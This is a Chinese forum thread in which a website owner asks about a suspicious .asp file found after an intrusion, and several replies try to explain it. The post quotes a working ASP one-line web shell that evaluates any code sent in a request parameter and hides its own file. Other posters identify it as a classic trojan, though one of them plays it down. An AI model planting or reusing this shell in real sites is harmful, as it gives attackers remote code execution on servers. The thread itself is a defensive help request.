有人入侵,帮忙分析下代码啥意思
突然发现文件夹中多了个.asp 里边是这样的代码:
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
大侠们帮着看看具体啥意思,以后怎么防范他们用这种方法呢?相当郁闷了,百度收录有40万呢,今儿一早变1了,就一主页搜蓝岭香柏网能出来一个,别的全被删了。熟seo的有没有有方法的,被删了还能回来不?
[解决办法]
仅仅这一处,不是关键。这只是把一个文件设置为了隐藏+只读属性。
从这一点,无论判断是恶意入侵,还是你所不了解的ASP应用的自我保护。
[解决办法]
着是asp小马文件 ,建议有条件找专业做安全的来处理解决
网站程序或服务器存在漏洞
听说Sine安全不错
[解决办法]
<%Eval(Request(chr(112)。。。。
典型的一句话木马
